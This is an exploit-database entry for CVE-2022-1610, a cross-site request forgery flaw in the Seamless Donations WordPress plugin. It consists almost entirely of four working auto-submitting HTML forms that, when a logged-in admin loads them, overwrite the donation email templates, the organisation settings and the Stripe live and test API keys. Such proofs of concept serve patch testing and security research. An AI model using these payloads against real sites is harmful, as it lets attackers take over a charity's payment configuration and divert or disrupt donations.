Exploit for Seamless Donations < 5.1.9 - Arbitrary Settings Update via CSRF CVE-2022-1610

Name: Exploit for Seamless Donations < 5.1.9 - Arbitrary Settings Update via CSRF CVE-2022-1610
Rating: 5 (74 reviews)
2022-05-26 | CVSS 4.3
## https://sploitus.com/exploit?id=WPEX-ID:88014DA6-6179-4527-8F67-FBB610804D93
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="seamless_donations_tab_templates">
    <input type="text" name="seamless_donations_template_email_test" value="evil@example.com">
    <input type="text" name="dgx_donate_button_settings_templates_test_email" value="Send Test Email">
</form>
<script>
    document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="seamless_donations_tab_templates">
    <input type="text" name="seamless_donations_template_email_test" value="">
    <input type="text" name="dgx_donate_email_name" value="testuserhacked">
    <input type="text" name="dgx_donate_email_reply" value="test@example.com">
    <input type="text" name="dgx_donate_email_subj" value="Thank you for your donation">
    <input type="text" name="dgx_donate_email_body" value="hacked">
    <textarea type="text" name="dgx_donate_email_recur">
Some link: https://google.com
    </textarea>
    <input type="text" name="dgx_donate_email_desig" value="Your donation has been designated to the [fund] fund.">
    <input type="text" name="dgx_donate_email_anon"
        value="You have requested that your donation be kept anonymous.  Your name will not be revealed to the public.">
    <input type="text" name="dgx_donate_email_list"
        value="Thank you for joining our mailing list.  We will send you updates from time-to-time.  If at any time you would like to stop receiving emails, please send us an email to be removed from the mailing list.">
    <input type="text" name="dgx_donate_email_empl"
        value="You have specified that your employer matches some or all of your donation.">
    <input type="text" name="dgx_donate_email_trib"
        value="You have asked to make this donation in honor of or memory of someone else.  Thank you!  We will notify the honoree within the next 5-10 business days.">
    <input type="text" name="dgx_donate_email_close" value="Thanks again for your support!">
    <input type="text" name="dgx_donate_email_sig" value="Director of Donor Relations">
    <input type="text" name="dgx_donate_button_template_settings" value="Save Changes">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="seamless_donations_tab_settings">
    <input type="text" name="dgx_donate_organization_name" value="uuuu">
    <input type="text" name="dgx_donate_notify_emails" value="test@example.com">
    <input type="text" name="dgx_donate_payment_processor_choice" value="STRIPE">
    <input type="text" name="dgx_donate_donor_fee_payment" value="NEVER">
    <input type="text" name="dgx_donate_button_settings_basics" value="Save Basic Settings">
    <input type="text" name="dgx_donate_stripe_server" value="SANDBOX">
    <input type="text" name="dgx_donate_live_stripe_api_key" value="">
    <input type="text" name="dgx_donate_live_stripe_secret_key" value="">
    <input type="text" name="dgx_donate_test_stripe_api_key" value="">
    <input type="text" name="dgx_donate_test_stripe_secret_key" value="">
    <input type="text" name="dgx_donate_stripe_billing_address" value="auto">
    <input type="text" name="dgx_donate_debug_mode" value="OFF">
    <input type="text" name="dgx_donate_log_obscure_name" value="on">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="seamless_donations_tab_settings">
    <input type="text" name="dgx_donate_organization_name" value="uuuu">
    <input type="text" name="dgx_donate_notify_emails" value="test@example.com">
    <input type="text" name="dgx_donate_payment_processor_choice" value="STRIPE">
    <input type="text" name="dgx_donate_donor_fee_payment" value="NEVER">
    <input type="text" name="dgx_donate_button_stripe_settings" value="Update Stripe API Key">
    <input type="text" name="dgx_donate_stripe_server" value="SANDBOX">
    <input type="text" name="dgx_donate_live_stripe_api_key" value="pk_live_www">
    <input type="text" name="dgx_donate_live_stripe_secret_key" value="sk_live_www">
    <input type="text" name="dgx_donate_test_stripe_api_key" value="pk_test_www">
    <input type="text" name="dgx_donate_test_stripe_secret_key" value="sk_test_www">
    <input type="text" name="dgx_donate_stripe_billing_address" value="auto">
    <input type="text" name="dgx_donate_debug_mode" value="OFF">
    <input type="text" name="dgx_donate_log_obscure_name" value="on">
</form>
<script>
    document.getElementById("test").submit();
</script>